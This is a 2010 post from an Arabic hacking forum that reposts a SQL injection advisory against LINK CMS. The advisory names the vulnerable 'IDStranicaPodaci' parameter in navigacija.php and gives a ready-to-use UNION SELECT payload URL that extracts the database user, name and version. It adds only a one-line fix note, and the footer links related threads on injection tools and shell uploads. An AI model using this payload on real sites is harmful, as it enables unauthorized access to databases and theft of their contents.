√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

Master vbspiders · 08-27-2010, 02:39 PM

كود PHP:


			
# Exploit Title: LINK CMS.SQL Injection Vulnerability

# Date: 2010-08-23

# Author: hacker@sr.gov.yu

# Software Link:

http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1

# Version: n/a

 

 

####################################################################

.:. Author : hacker@sr.gov.yu

.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)

.:. Home : www.evilzone.org, www.pentesting-rs.org

.:. Script : LINK CMS

.:. Bug Type : Sql Injection

.:. Risk: High

.:. Tested on : Windows & Linux

 ####################################################################

 

===[ Exploit ]===

 

.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"

parameter value.

 

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

 

===[ Example ]===

 

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63

UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--

 

 

===[ Solution ]===

 

.:. Input validation of "IDStranicaPodaci" parameter should be corrected.

 

 

Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!

Pozdrav za sve iz Srbije!!! :-)))

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection	KaLa$nikoV	SQL قواعد البيانات	127	05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث}	Master vbspiders	SQL قواعد البيانات	280	08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection	Black-FoG	SQL قواعد البيانات	73	03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨	support	قسم ستآيلات الـ vB	0	09-18-2009 11:52 PM